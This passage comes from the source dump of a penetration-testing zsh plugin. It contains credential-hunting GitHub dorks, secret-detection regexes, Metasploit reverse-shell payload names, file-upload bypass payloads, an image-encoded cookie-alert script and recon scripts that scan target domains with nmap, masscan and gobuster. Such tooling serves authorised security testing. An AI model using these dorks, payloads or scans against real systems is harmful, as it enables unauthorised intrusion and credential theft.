"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\"\\s][0-9a-zA-Z]{32,45}['\"\\s]", "Generic API Key": "[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\"\\s][0-9a-zA-Z]{32,45}['\"\\s]", "Slack Webhook": "https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}", "Google (GCP) Service-account": "\"type\": \"service_account\"", "Twilio API Key": "SK[a-z0-9]{32}", "Password in URL": "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]", “Internal subdomain”: re.compile(‘([a-z0-9]+[.]*supersecretinternal[.]com)’), “Slack Token”: re.compile(‘(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})’), “RSA private key”: re.compile(‘—–BEGIN RSA PRIVATE KEY—–‘), “Facebook Oauth”: re.compile(‘[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\’|”][0-9a-f]{32}[\’|”]’), “Twitter Oauth”: re.compile(‘[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\’|”][0-9a-zA-Z]{35,44}[\’|”]’), “Google Oauth”: re.compile(‘(“client_secret”:”[a-zA-Z0-9-_]{24}”)’), “AWS API Key”: re.compile(‘AKIA[0-9A-Z]{16}’),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}’), “Heroku API Key”: re.compile(‘[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}’), “Generic Secret”: re.compile(‘[s|S][e|E][c|C][r|R][e|E][t|T].*[\’|”][0-9a-zA-Z]{32,45}[\’|”]’) ================================================ FILE: payloads/msf-windows-payloads.txt ================================================ windows/x64/meterpreter/reverse_http windows/x64/meterpreter/reverse_https windows/x64/meterpreter/reverse_named_pipe windows/x64/meterpreter/reverse_tcp windows/x64/meterpreter/reverse_winhttp windows/x64/meterpreter/reverse_winhttps windows/x64/shell/reverse_tcp windows/x64/shell/reverse_tcp_rc4 windows/x64/shell/reverse_tcp_uuid windows/x64/shell_bind_tcp windows/x64/shell_reverse_tcp ================================================ FILE: payloads/recon-dorks-github.txt ================================================ filename:constants filename:settings filename:database 
filename:config
filename:environment
filename:spec
filename:zhrc
filename:bash
filename:npmrc
filename:dockercfg
filename:pass
filename:global
filename:credentials
filename:connections
filename:s3cfg
filename:wp-config
filename:htpasswd
filename:git-credentials
filename:id_dsa
filename:id_rsa
extension:env
extension:cfg
extension:ini
language:yaml -filename:travis
extension:properties
extension:bat
extension:sh
extension:zsh
extension:pem
extension:ppk
extension:sql
filename:bash_history
filename:bash_profile
filename:bashrc
filename:cshrc
filename:history
filename:netrc
filename:pgpass
filename:tugboat
filename:dhcpd.conf
filename:express.conf
filename:filezilla.xml
filename:idea14.key
filename:makefile
filename:gitconfig
filename:prod.exs
filename:prod.secret.exs
filename:proftpdpasswd
filename:recentservers.xml
filename:robomongo.json
filename:server.cfg
filename:shadow
filename:sshd_config
filename:known_hosts
filename:dockercfg
filename:github_token
staging
stg
prod
preprod
swagger
internal
dotfiles
dot-files
mydotfiles
config
dbpasswd
db_password
db_username
dbuser
testuser
dbpassword
keyPassword
storePassword
passwords
password
secret.password
database_password
sql_password
passwd
pass
pwd
pwds
root_password
credentials
security_credentials
connectionstring
private -language:java
private_key
master_key
token
access_token
auth_token
oauth_token
authorizationToken
secret
secrets
secret_key
secret_token
api_secret
app_secret
appsecret
client_secret
key
send_keys
send.keys
sendkeys
apikey
api_key
app_key
application_key
appkey
appkeysecret
access_key
apiSecret
x-api-key
apidocs
secret_access_key
encryption_key
consumer_key
auth
secure
login
conn.login
sshpass
ssh2_auth_password
irc_pass
fb_secret
sf_username
node_env
aws_key
aws_token
aws_secret
aws_access
AWSSecretKey
github_key
github_token
gh_token
slack_api
slack_token
bucket_password
redis_password
ldap_username
ldap_password
gmail_username
gmail_password
codecov_token
fabricApiSecret
mailgun
mailchimp
appspot
firebase
gitlab
stripe
herokuapp
cloudfront
amazonaws
removed
"removed password"
hardcoded
oops
"fixed security"
"removed prod"
"removed creds"
"removed secret"
filename:passwords.txt
filename:users.txt

================================================
FILE: payloads/recon-dorks-google.txt
================================================

================================================
FILE: payloads/resolvers.txt
================================================

================================================
FILE: payloads/secrets-content.json
================================================
{
  "flags": "-HnriE",
  "patterns": [
    "[a-z0-9.-]+\\.s3\\.amazonaws\\.com",
    "[a-z0-9.-]+\\.s3-[a-z0-9-]\\.amazonaws\\.com",
    "[a-z0-9.-]+\\.s3-website[.-](eu|ap|us|ca|sa|cn)",
    "//s3\\.amazonaws\\.com/[a-z0-9._-]+",
    "//s3-[a-z0-9-]+\\.amazonaws\\.com/[a-z0-9._-]+",
    "([^A-Z0-9]|^)(AKIA|A3T|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{12,}",
    "([^A-Za-z0-9+/]|^)(eyJ|YTo|Tzo|PD[89]|aHR0cHM6L|aHR0cDo|rO0)[%a-zA-Z0-9+/]+={0,2}",
    "([^A-Z0-9]|)AKIA[A-Z0-9]{12}([^A-Z0-9]|)",
    "[\\s][a-zA-Z0-9]{40}[\\s]",
    "aws_secret_access_key.*?[a-zA-Z0-9/\\\\+]{40}",
    "amzn\\\\.mws\\\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}",
    "EAACEdEose0cBA[0-9A-Za-z]+",
    "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\\\"][0-9a-f]{32}['|\\\"]",
    "[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].*['|\\\"][0-9a-zA-Z]{32,45}['|\\\"]",
    "[s|S][e|E][c|C][r|R][e|E][t|T].*['|\\\"][0-9a-zA-Z]{32,45}['|\\\"]",
"[\\s*](token:\\s*)[\\S]{20}", "gitlab.token[^a-z0-9_]*?[a-z0-9_]{20}([^a-z0-9_]|$)", "private.token[^a-z0-9_]*?[a-z0-9_]{20}([^a-z0-9_]|$)", "access.token[^a-z0-9_]*?[a-z0-9_]{20}([^a-z0-9_]|$)", "[g|G][i|I][t|T][h|H][u|U][b|B].*['|\\\"][0-9a-zA-Z]{35,40}['|\\\"]", "\"type\": \"service_account\"", "[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com", "ya29\\.[0-9A-Za-z\\-_]+", "AIza[0-9A-Za-z\\\\-_]{35}", "[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}", "[0-9a-f]{32}-us[0-9]{1,2}", "key-[0-9a-zA-Z]{32}", "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]", "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}", "sk_live_[0-9a-z]{32}", "(-*)BEGIN [\\\\s\\\\S]{2,} PRIVATE KEY(-*)", "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}", "(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})", "(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})", "https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}", "sq0atp-[0-9A-Za-z\\\\-_]{22}", "sq0csp-[0-9A-Za-z\\\\-_]{43}", "sk_live_[0-9a-zA-Z]{24}", "rk_live_[0-9a-zA-Z]{24}", "SK[0-9a-fA-F]{32}", "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[1-9][0-9]+-[0-9a-zA-Z]{40}", "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*['|\"][0-9a-zA-Z]{35,44}['|\"]", "deleted", "security", "removed", "test-data", "prod", "production" ] } ================================================ FILE: payloads/secrets-files.json ================================================ { "flags": "-HnriE", "patterns": [ "database", "settings", "database", "config", "environment", "spec", "zshrc", "bash", "npmrc", "dockercfg", "pass", "global", "credentials", "connections", "s3cfg", "wp-config", "htpasswd", "git-credentials", "id_dsa", "id_rsa", "creds", ".*\\.env$", "\\.agilekeychain$", "\\.?aws/credentials$", "^\\.?htpasswd$", "\\.keychain$", "\\.cscfg$", "carrierwave.rb", "knife.rb", "\\.?chef/(.*)\\.pem$", "^(\\.|_)?netrc$", "credential", "password", 
"^\\.?dbeaver-data-sources.xml$", "\\.dayone$", "doctl/config.yaml$", "settings.py", "^\\.?dockercfg$", "^\\.?env$", "filezilla.xml", "recentservers.xml", "^key(store|ring)$", "^\\.?gitconfig$", "config/hub$", "\\.gnucash$", "credentials.db", "credentials.json", "^.*-[a-f0-9]{12}\\.json$", "\\.?xchat2?/servlist_?\\.conf$", "\\.?irssi/config$", "\\.jks$", "jenkins.plugins.publish_over_ssh.BapSshPublisherPlugin.xml", "\\.kwallet$", "^kdbx?$", ".boto", "adc.json", "configuration.user.xpl", "\\.tpm$", "\\.bek$", "\\.mdf$", "\\.sdf$", "^\\.?muttrc$", "^\\.?mysql_history$", "^\\.?npmrc$", "\\.pcap$", "omniauth.rb", "\\.ovpn$", "config(\\.inc)?\\.php$", "\\.psafe3$", "otr.private_key", "\\.?purple/accounts\\.xml$", "^\\.?psql_history$", "^\\.?pgpass$", "credentials.xml", "etc/passwd$", "etc/shadow$", "LocalSettings.php", "database.yml", "\\.pkcs12$", "\\.p12$", "\\.pfx$", "\\.asc$", "^key(pair)?$", "\\.pem$", "journal.txt", "^.*_rsa$", "^.*_dsa$", "^.*_ed25519$", "^.*_ecdsa$", "\\.?recon-ng/keys\\.db$", "\\.rdp$", "robomongo.json", "^\\.?irb_history$", "secret_token.rb", "\\.?gem/credentials$", "^\\.?s3cfg$", "^sftp-config(\\.json)?$", "^sql(dump)?$", "\\.sqlite$", "\\.?ssh/config$", "Favorites.plist", "`^\\.?(bash_|zsh_)?aliases$", "^\\.?(bash_|zsh_|sh_|z)?history$", "^\\.?(bash|zsh|csh)rc$", ".exports", ".functions", ".extra", "^\\.?(bash_|zsh_)?profile$", "^\\.?trc$", "terraform.tfvars", "^\\.?tugboat$", "\\.tblk$", "ventrilo_srv.ini", "^\\.?gitrobrc$", "\\.fve$", "proftpdpasswd", "^\\.?git-credentials$", "robomongo.json", "idea14.key", "express.conf", "prod.exs", "prod.secret.exs", "logins.json", ".remote-sync.json", ".ftpconfig" ] } ================================================ FILE: payloads/tcp-ports.txt ================================================ 21,22,25,80,88,161,443,445,744,1433,1521,2075,2076,3000,3306,3366,3389,3868,4000,4040,4044,4443,5000,5432,5900,6000,6443,7077,8000,8080,8081,8089,8181,8443,8888,9000,9091,9443,9999,27017,10000,15672 
================================================
FILE: payloads/user-agents.txt
================================================
Googlebot/2.1 (+http://www.google.com/bot.html)
Mozilla/5.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148

================================================
FILE: payloads/web-file-upload-bypass-bytes.txt
================================================
JPEG - FF D8 FF DB - ÿØÿÛ
GIF - 47 49 46 38 - GIF8
PNG - 89 50 4E 47 - ‰PNG

================================================
FILE: payloads/web-file-upload-bypass.txt
================================================
Content-Disposition: form-data; name="upload"; filename="badfile.''gif"
Content-Type: image/png

GIF8

================================================
FILE: payloads/wordlist-api.txt
================================================
0
1
2
3
accelerate
accept
account
accounts
acquire
activate
active
adapt
add
address-check
adjust
admin
alert
amount
annotate
anticipate
api
api_auth
apis
apply
archive
arrange
asset
assets
auth
auth_user
balance
balances
bar
baz
bio
bios
build
calculate
cfg
change
channel
chart
check
child
children
claim
class
client
clients
close
collect
comm
comment
comments
common
communicate
company
compare
complete
compose
compute
conf
config
connections
consolidate
construct
contact
contract
coordinate
count
create
credentials
creds
crush
csv
current
custom
customer
customers
damage
dashboard
data
debug
def
default
define
del
delete
deliver
delta
demo
demonstrate
dequeue
derive
design
destroy
details
detect
dev
develop
developers
deviceCatalog
devices
deviceTypes
devise
dir
directory
disable
display
divide
do
dob
docs
documentation
doFor
domain
download
edit
email
employee
enable
err
errors
event
events
explode
export
fabricate
fashion
feed
file
files
filter
foo
forge
form
format
generate
get
github
gmail
go
group
health
help
hidden
history
home
id
image
import
improve
include
info
inform
input
inquiry
insert
install
instances
interpret
item
job
join
json
key
kill
lang
last
level
link
links
list
load
location
lock
log
log_event
login
logins
logout
logs
loop
main
make
manufacturers
map
max
member
members
merchant
merge
metadata
method
methods
metrics
min
mod
money
monitoring
move
multiply
my
name
names
new
next
notifications
notify
oauth
object
objects
open
option
options
order
orders
originate
out
pack
page
pages
panel
parent
parse
pass
password
passwords
permissions
phone
picture
pin
plugin
post
posts
preferences
preserve
preview
print
private
prod
produce
production
profile
profiles
promote
public
put
q
query
queue
queue-jobs
quit
raw
reactivate
read
recite
record
ref
reg
register
release
remove
resend-verification
restore
restrict
retrieve
robots.txt
rss
run
s
sale
sales
save
search
select
send
server
set
setting
settings
setup
show
site
sleep
sort
split
start
state
status
stop
study
sub
summaries
swagger
swagger.json
swagger-resources
swagger-ui.html
table
tags
temp
template
terminate
test
tests
theme
ticket
tmp
token
twitter
type
understand
undo
union
unit
unqueue
update
upgrade
upload
upset
url
use
user
userAccountAssignments
userAssets
userdetails
username
userPreferences
users
v0
v1
v2
v3
validate
vendor
vendors
verify
version
wait
website
work
xml
xmlrpc
yahoo
zip

================================================
FILE: payloads/wordlists.txt
================================================
/usr/share/seclists/Discovery/Web-Content/quickhits.txt
/usr/share/seclists/Discovery/Web-Content/common.txt
/usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt
/usr/share/seclists/Discovery/Web-Content/swagger.txt
/usr/share/seclists/Discovery/Web-Content/graphql.txt

================================================
FILE: quiver.code-workspace
================================================
{
  "folders": [
    {
      "path": "."
    }
  ]
}

================================================
FILE: quiver.plugin.zsh
================================================
#!/usr/bin/env zsh
autoload colors; colors

#############################################################
# quiver
# Author: Steve Mcilwain
# Contributors:
#############################################################

# check for essential packages
dpkg -l | grep -qw rlwrap || sudo apt-get -y install rlwrap
dpkg -l | grep -qw git || sudo apt-get -y install git

# check for directories
mkdir -p $HOME/.quiver/{vars,globals}

#############################################################
# Constants
#############################################################

export __PLUGIN="${0:A:h}"
export __VER=$(cat ${__PLUGIN}/VERSION)
export __LOGFILE="${__PLUGIN}/log.txt"
export __REMOTE_CHK="${__PLUGIN}/remote_checked.txt"
export __REMOTE_VER="${__PLUGIN}/remote_ver.txt"
export __STATUS=$(cd ${__PLUGIN} && git status | grep On | cut -d" " -f2,3)
export __VARS=$HOME/.quiver/vars
export __GLOBALS=$HOME/.quiver/globals
export __PAYLOADS="$__PLUGIN/payloads"
export __SCRIPTS="$__PLUGIN/scripts"
export __TOOLS="$HOME/tools"

#############################################################
# Self Update
#############################################################

__version-check() {
  local seconds=$((60*60*24*1))
  if test -f "$__REMOTE_CHK" ; then
    if test "$(($(date "+%s")-$(date -f "$__REMOTE_CHK" "+%s")))" -lt "$seconds" ; then
      echo "[*] Version already checked today: $__REMOTE_CHK" >> ${__LOGFILE}
      exit 1
    fi
  fi
  date -R > $__REMOTE_CHK
  echo "$(curl -s https://raw.githubusercontent.com/stevemcilwain/quiver/master/VERSION)" > $__REMOTE_VER
  echo "[*] Version checked and stored in: $__REMOTE_VER" >> ${__LOGFILE}
}

(__version-check &)

#############################################################
# Diagnostic Log
#############################################################

echo "Quiver ${__VER} in ${__PLUGIN}" > ${__LOGFILE}
echo " " >> ${__LOGFILE}
echo "[*] loading... " >> ${__LOGFILE}

#Source all qq scripts
for f in ${0:A:h}/modules/qq* ; do
  echo "[+] sourcing $f ... " >> ${__LOGFILE}
  source $f >> ${__LOGFILE} 2>&1
done

source ${__ALIASES}

# completion enhancement
# zstyle ':completion:*' matcher-list 'r:|[-]=**'
ZSTYLE_ORIG=`zstyle -L ':completion:\*' matcher-list`
ZSTYLE_NEW="${ZSTYLE_ORIG} 'r:|[-]=**'"
eval ${ZSTYLE_NEW}

echo "[*] quiver loaded." >> ${__LOGFILE}

#############################################################
# Shell Log
#############################################################

echo " "
if [[ -f "$__REMOTE_VER" ]]; then
  echo "[*] Remote version file exists: $__REMOTE_VER " >> ${__LOGFILE}
  rv=$(cat ${__REMOTE_VER})
  if [[ ! -z $rv ]]; then
    echo "[*] Remote version is |${rv}|" >> ${__LOGFILE}
    [[ "$rv" == "$__VER" ]] && __info "Quiver is up to date" || __warn "Quiver update available: $rv, use qq-update to install"
  fi
fi

__info "Quiver ${__VER} ZSH plugin loaded "

================================================
FILE: scripts/dns-reverse-brute.zsh
================================================
#!/usr/bin/env zsh

#############################################################
# dns-reverse-brute
#############################################################

#[[ -z $1 ]] && echo -e "[!] Missing argument.\nUsage: zsh $0 " && exit

cat $1 | while read domain; do
  if host -t A "$domain" | awk '{print $NF}' | grep -E '^(192\.168\.|172\.1[6789]\.|172\.2[0-9]\.|172\.3[01]\.|10\.)' &>/dev/null; then
    echo $domain;
  fi;
done

================================================
FILE: scripts/image-gen.js
================================================
(function() {
  function encode(a) {
    if (a.length) {
      var c = a.length,
        e = Math.ceil(Math.sqrt(c / 3)),
        f = e,
        g = document.createElement("canvas"),
        h = g.getContext("2d");
      g.width = e, g.height = f;
      var j = h.getImageData(0, 0, e, f),
        k = j.data,
        l = 0;
      for (var m = 0; m < f; m++)
        for (var n = 0; n < e; n++) {
          var o = 4 * (m * e) + 4 * n,
            p = a[l++],
            q = a[l++],
            r = a[l++];
          (p || q || r) && (p && (k[o] = ord(p)), q && (k[o + 1] = ord(q)), r && (k[o + 2] = ord(r)), k[o + 3] = 255)
        }
      return h.putImageData(j, 0, 0), h.canvas.toDataURL()
    }
  }
  var ord = function ord(a) {
      var c = a + "",
        e = c.charCodeAt(0);
      if (55296 <= e && 56319 >= e) {
        if (1 === c.length) return e;
        var f = c.charCodeAt(1);
        return 1024 * (e - 55296) + (f - 56320) + 65536
      }
      return 56320 <= e && 57343 >= e ? e : e
    },
    d = document,
    b = d.body,
    img = new Image;
  var stringenc = "Hello, World!";
  img.src = encode(stringenc), b.innerHTML = "", b.appendChild(img)
})();

(function() {
  function encode(a) {
    if (a.length) {
      var c = a.length,
        e = Math.ceil(Math.sqrt(c / 3)),
        f = e,
        g = document.createElement("canvas"),
        h = g.getContext("2d");
      g.width = e, g.height = f;
      var j = h.getImageData(0, 0, e, f),
        k = j.data,
        l = 0;
      for (var m = 0; m < f; m++)
        for (var n = 0; n < e; n++) {
          var o = 4 * (m * e) + 4 * n,
            p = a[l++],
            q = a[l++],
            r = a[l++];
          (p || q || r) && (p && (k[o] = ord(p)), q && (k[o + 1] = ord(q)), r && (k[o + 2] = ord(r)), k[o + 3] = 255)
        }
      return h.putImageData(j, 0, 0), h.canvas.toDataURL()
    }
  }
  var ord = function ord(a) {
      var c = a + "",
        e = c.charCodeAt(0);
      if (55296 <= e && 56319 >= e) {
        if (1 === c.length) return e;
        var f = c.charCodeAt(1);
        return 1024 * (e - 55296) + (f - 56320) + 65536
      }
      return 56320 <= e && 57343 >= e ? e : e
    },
    d = document,
    b = d.body,
    img = new Image;
  var stringenc = "function asd() {\
var d = document;\
var c = 'cookie';\
alert(d[c]);\
};asd();/*Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam aliquam blandit metus vel elementum. Mauris mi tortor, congue eget fringilla id, tempus a tellus. Morbi laoreet vitae ipsum vel dapibus. Nunc eu faucibus ligula. Donec maximus malesuada justo. Nulla congue, risus quis dapibus porttitor, metus quam rutrum dolor, ac maximus nibh metus quis enim. Aenean hendrerit venenatis massa ac gravida. Donec at nisi quis ex sollicitudin bibendum sit amet ac quam.\
Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum.
Ut pulvinar est non tellus tristique sodales. Aenean eget velit non turpis tristique pretium id eu dolor. Nulla sed eros quis urna facilisis scelerisque. Nam orci neque, finibus eget odio et, elementum finibus erat.*/"; img.src = encode(stringenc), b.innerHTML = "", b.appendChild(img) })();

================================================
FILE: scripts/recon.zsh
================================================
#!/usr/bin/env zsh

# continue on errors
set +e

autoload colors; colors

__info() echo "$fg[blue][*] $@ $reset_color"
__ok()   echo "$fg[green] [+] $@ $reset_color"
__warn() echo "$fg[yellow][>] $@ $reset_color"
__err()  echo "$fg[red][!] $@ $reset_color"

#############################################################
# Recon
#############################################################

# usage: zsh recon.zsh <domain> <org> <output-dir>
[[ -z $1 ]] && __err "Missing argument.\nUsage: zsh $0 <domain> <org> <dir>" && exit 1
[[ -z $2 ]] && __err "Missing argument.\nUsage: zsh $0 <domain> <org> <dir>" && exit 1
[[ -z $3 ]] && __err "Missing argument.\nUsage: zsh $0 <domain> <org> <dir>" && exit 1

export DOMAIN=$1
export ORG=$2
export DIR=$3

export UA="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"

export F_ASN="${DIR}/asn.txt"
export F_CIDR="${DIR}/cidr.txt"
export F_SUBS="${DIR}/subs.txt"
export F_SUBS_RES="${DIR}/subs.resolved.txt"
export F_HOSTS="${DIR}/hostnames.txt"
export F_HOSTS_IP="${DIR}/hostips.txt"
export F_WEB="${DIR}/urls.txt"

export PORTS="21,22,25,80,443,135-139,445,3389,3306,1433,389,636,88,111,2049,1521,110,143,161,6379,5900,2222,4443,8000,8888,8080,9200"

#############################################################
# Startup
#############################################################

__info "Recon.zsh running... "
__info "Domain: ${DOMAIN} Org: ${ORG}"
__info "Using current directory for output: ${DIR}"

#############################################################
# Steps
#############################################################

org() {
    __ok "metagoofil'ing files"
    mkdir -p ${DIR}/files
    # runs in the background; the workflow waits for it at the end
    metagoofil -u "${UA}" -d ${DOMAIN} -t pdf,doc,docx,ppt,pptx,xls,xlsx -w -l 100 -n 50 -o ${DIR}/files > /dev/null 2>&1 &
}

network() {
    __ok "Amass'ing ASNs"
    amass intel -org "${ORG}" | cut -d, -f1 > ${F_ASN}

    __ok "BGPview'ing CIDRs"
    # truncate once, then append per ASN; a plain '>' inside the loop kept only the last ASN's prefixes
    : > ${F_CIDR}
    for asn in $(cat ${F_ASN})
    do
        if [[ ! -z ${asn} ]]
        then
            curl -s https://api.bgpview.io/asn/${asn}/prefixes | jq -r '.data | .ipv4_prefixes | .[].prefix' >> ${F_CIDR}
        fi
    done

    __ok "dnsrecon'ing PTRs"
    network_dnsrecon

    #__ok "masscan'ing CIDRs"
    #network_masscan
}

network_dnsrecon() {
    mkdir -p ${DIR}/ptr
    for cidr in $(cat ${F_CIDR})
    do
        if [[ ! -z ${cidr} ]]
        then
            local net=$(echo ${cidr} | cut -d/ -f1)
            dnsrecon -d ${DOMAIN} -r ${cidr} -n 1.1.1.1 -c ${DIR}/ptr/ptr.${net}.csv > /dev/null 2>&1
        fi
    done
}

network_masscan() {
    mkdir -p ${DIR}/net
    for cidr in $(cat ${F_CIDR})
    do
        if [[ ! -z ${cidr} ]]
        then
            local net=$(echo ${cidr} | cut -d/ -f1)
            sudo masscan ${cidr} -p${PORTS} -oL ${DIR}/net/masscan.${net}.txt > /dev/null 2>&1
        fi
    done
}

domains() {
    echo "${DOMAIN}" > ${DIR}/domains.txt

    __ok "Subfinder'ing "
    subfinder -d ${DOMAIN} -nW -silent >> ${F_SUBS} 2> /dev/null

    __ok "crt.sh'ing "
    # double quotes so ${DOMAIN} expands (single quotes sent the literal text "$DOMAIN"); %25 is the URL-encoded wildcard
    curl -s "https://crt.sh/?q=%25.${DOMAIN}" | grep -i "${DOMAIN}" | cut -d '>' -f2 | cut -d '<' -f1 | grep -v " " | sort -u >> ${F_SUBS} 2> /dev/null

    __ok "waybackurls'ing... "
    echo ${DOMAIN} | waybackurls | cut -d "/" -f3 | sort -u | grep -v ":80" >> ${F_SUBS} 2> /dev/null

    __ok "sorting results "
    sort -u -o ${F_SUBS} ${F_SUBS}
}

lookups() {
    __ok "massdns'ing domains"
    /opt/recon/massdns/bin/massdns -r /opt/recon/massdns/lists/resolvers.txt -t A -o S ${F_SUBS} -w ${F_SUBS_RES} > /dev/null 2>&1

    __ok "extracting resolved hostnames"
    # massdns simple output is "name. TYPE data": keep the first field and drop its trailing dot
    awk '{ sub(/\.$/, "", $1); print $1 }' ${F_SUBS_RES} | sort -u >> ${F_HOSTS}

    __ok "extracting resolved IP addresses"
    grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' ${F_SUBS_RES} | sort -u | sort -V -o ${F_HOSTS_IP}
}

scans() {
    __ok "scanning host IP's"
    mkdir -p ${DIR}/hosts
    for h in $(cat ${F_HOSTS_IP})
    do
        __ok "...scanning ${h}"
        mkdir -p ${DIR}/hosts/${h}
        nmap -sT -p ${PORTS} -T4 --open ${h} -oA ${DIR}/hosts/${h}/scan > /dev/null 2>&1
    done
}

web() {
    __ok "httprobing resolved hosts"
    # httprobe prints https://host:443; the sed strips the ":443" suffix
    cat ${F_HOSTS} | httprobe -t 3000 -s -p https:443 | sed 's/....$//' >> ${F_WEB} 2> /dev/null

    mkdir -p ${DIR}/web
    for url in $(cat ${F_WEB})
    do
        __ok "...enumerating ${url} ... "
        local host=$(echo ${url} | cut -d/ -f3)
        local hdir=${DIR}/web/${host}
        mkdir -p ${hdir}

        __ok "Getting IP address"
        host ${host} > ${hdir}/ip.txt 2> /dev/null

        __ok "Curling robots.txt"
        curl -s -L ${url}/robots.txt -o ${hdir}/robots.txt > /dev/null 2>&1

        __ok "Whatwebbing"
        whatweb ${url} -a 1 > ${hdir}/whatweb.txt 2> /dev/null

        __ok "Wafw00fing"
        wafw00f ${url} > ${hdir}/waf.txt 2> /dev/null

        __ok "Gobustering"
        gobuster dir -q -z -u ${url} -w /usr/share/seclists/Discovery/Web-Content/common.txt -t10 -k -o ${hdir}/gobuster.txt > /dev/null 2>&1

        __ok "S3 Bucketing"
        # written next to the other per-host results, not to a shared s3.txt in the working directory
        aws s3 ls s3://${host} > ${hdir}/s3.txt 2> /dev/null
    done
}

#############################################################
# Workflow
#############################################################

__info "Searching for Org OSINT... "
org
__info "Mapping Network... "
network
__info "Collecting sub-domains..."
domains
__info "Resolving sub-domains... "
lookups
__info "Scanning IP addresses..."
scans
__info "Probing web servers..."
web
__info "Checking job completion..."
wait $(jobs -p)
__info "Recon completed"
echo " "

================================================
FILE: scripts/webrecon.zsh
================================================
#!/usr/bin/env zsh
# usage: zsh webrecon.zsh <file with one URL per line>

red=`tput setaf 1`
green=`tput setaf 2`
yellow=`tput setaf 3`
reset=`tput sgr0`

echo -e "[*] webrecon.zsh "
echo -e "[*] source: $1"
echo -e " "

for url in $(cat $1);do
    echo -e "[*] Enumerating ${url}"

    ############################################################
    # Make directory
    ############################################################
    host=$(echo $url | cut -d "/" -f3)
    echo -e "${green} [+] Making directory ${host} ${reset}"
    mkdir -p ${host}

    ############################################################
    # Host
    ############################################################
    echo -e "${green} [+] Getting IP address... ${reset}"
    host ${host} | tee ${host}/ip.txt > /dev/null

    ############################################################
    # Robots
    ############################################################
    echo -e "${green} [+] Curling... robots.txt ${reset}"
    curl -s -L ${url}/robots.txt -o ${host}/robots.txt

    ############################################################
    # Ports
    ############################################################
    echo -e "${green} [+] Nmapping... ${reset}"
    nmap -sT --top-ports 100 --open ${host} -oA ${host}/ports > /dev/null

    ############################################################
    # Whatweb
    ############################################################
    echo -e "${green} [+] Whatwebbing... ${reset}"
    whatweb ${url} -a 1 > ${host}/whatweb.txt 2> /dev/null

    ############################################################
    # Wafw00f
    ############################################################
    echo -e "${green} [+] Wafw00fing... ${reset}"
    wafw00f ${url} > ${host}/waf.txt 2> /dev/null

    ############################################################
    # Gobuster
    ############################################################
    echo -e "${green} [+] Gobustering... ${reset}"
    gobuster dir -q -z -u ${url} -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -k -o ${host}/gobuster-dirs.txt 2> /dev/null

    ############################################################
    # Eyewitness
    ############################################################
    #echo -e "${green} [+] Screenshotting... ${reset}"
    #eyewitness --web --single ${url} -d ./${host}/screens --no-prompt &> /dev/null

    ############################################################
    # AWS
    ############################################################
    echo -e "${green} [+] S3 Bucketing... ${reset}"
    # per-host output file; the old shared s3.txt was overwritten on every loop iteration
    aws s3 ls s3://${host} > ${host}/s3.txt 2> /dev/null

    echo -e " "
done

echo -e " "
echo -e "[*] Done"

================================================
FILE: scripts/wildcards.py
================================================
#!/usr/bin/env python3
# coding=utf-8
# *******************************************************************
# *** Wildcards ***
# * Description:
#   A script that does recon on public bug bounty wildcard domains.
# * Version:
#   v0.1
# * Homepage:
#   https://github.com/stevemcilwain/wildcards
# * Author:
#   Steve Mcilwain
# *******************************************************************

# Modules
import sys
import requests
import os

# Configuration
